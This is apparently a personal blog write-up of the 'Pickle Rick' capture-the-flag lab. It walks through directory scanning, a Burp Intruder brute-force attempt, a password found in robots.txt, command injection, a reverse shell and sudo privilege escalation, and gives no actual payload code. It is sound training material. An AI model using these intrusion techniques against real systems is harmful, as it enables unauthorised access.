Pickle Rick - A Rick and Morty CTF. Help turn Rick back into a human!
To start we do a Connectivity testing to our target machine.
To search through other directories, we use `gobuster`.
I tried several different directory lists to discover additional directories, including:
- `/usr/share/wordlists/dirbuster/directories.jbrofuzz`
- `/usr/share/wordlists/dirbuster/directory-list-1.0.txt`
- `/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
- `/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt`
- `/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt`
We conducted an inspection to examine the code and discovered an interesting detail—a username embedded within it.
I was unable to locate the directory using Dirsearch and Gobuster, but I did find accessible paths like `/login`, `/uploads`, and `/login.php`. Since we identified a username, it's likely that a login page exists.
Additionally, there are three images located under `/assets`, which I suspect are being used on other pages of the site.
I used Burp Suite and followed the steps in `Activities > OWASP Juice Shop > Who broke my code`. After logging into the login page, I enabled interception in Burp, sent the request to Intruder, and added a payload marker to the password field. I then used a list of common passwords to attempt cracking the login. Initially, I encountered an error using the cluster bomb attack type, so I switched to the sniper attack, which resolved the issue.
"The brute force attack was unsuccessful because I’m receiving a lot of 200 status code, which indicates that the behavior is not as expected."
"I did some research and discovered that many websites include a default file called `robots.txt`. This file is a standard used to communicate with web crawlers and robots, such as those used by search engines, and specifies which parts of the website should not be crawled or indexed."
https://www.seobility.net/en/wiki/Robots.txt?utm_id=8783357192_87472061646&utm_source=google&utm_medium=cpc&utm_cid=8783357192&utm_agid=87472061646&utm_campaign=geoEN-Wiki&utm_dev=c&utm_devicemodel=&utm_mt=e&utm_term=robots%20txt&gad_source=1&gclid=CjwKCAjwuMC2BhA7EiwAmJKRrHdMFPqx28gr1giysCawPr3FG8iBqJhBpIyVeOr5Iq21fu1qYSxoQxoCXX4QAvD_BwE
Upon inspection on the robots.txt, we found some unusual strings and have saved them for further analysis.
Wubbalubbadubdub --> saved this one that can be use.
**Need to add this to always check the robots.txt and may find interesting details here.
Since we previously obtained some information related to usernames, and we suspect that the unusual string we found is a password, we used these details to attempt a login and were successful.
I attempted a command injection and it was successful. I discovered detailed information that could be useful for further actions on this website.
Did below but it was disabled.
Use the `pwd` command to check the current working directory.
I used the details that we retrieved via `ls` command and was able to find the first ingredient for Rick."
I attempted to upload a `php-reverse-shell.php` using the following steps.
I observed communication, but the payload did not appear in the `/assets` directory or in the list after logging in.
Instead, I used the following reverse shell and executed it directly from the Command Panel, which successfully gave me a shell.
After gaining access to the shell, I explored the environment and located the second ingredient in the `/home/rick/` directory.
And tried it and was able to get into root, however in using "sudo" it will always ask you for a password. However, here as you can see there were no prompt with regards to password. And tried to check the sudo via "Sudo -l" and found out that www-data can run the following commnds on "ALL"
I successfully completed the Pickle Rick CTF by capturing all the flags, earning 60 points in the process. The points don’t matter much to me, though—what’s important is applying everything I’ve learned so far in this challenge and gaining valuable experience.
While working on this challenge, I also gained new knowledge and techniques throughout the penetration testing process.
I hope this write-up helps you with the Pickle Rick Capture the Flag challenge. It's meant to share knowledge and document the techniques I’ve learned and applied during this challenge, with no intention of infringing on any content.
I reviewed John Hammond's steps and discovered that using Nikto could have made it easier to find the `robots.txt` file. I also learned that including file extensions such as `-x php,sh,txt,cgi,html,js,css,py` when scanning directories can yield results more quickly, streamlining the penetration testing process.
Comments
Post a Comment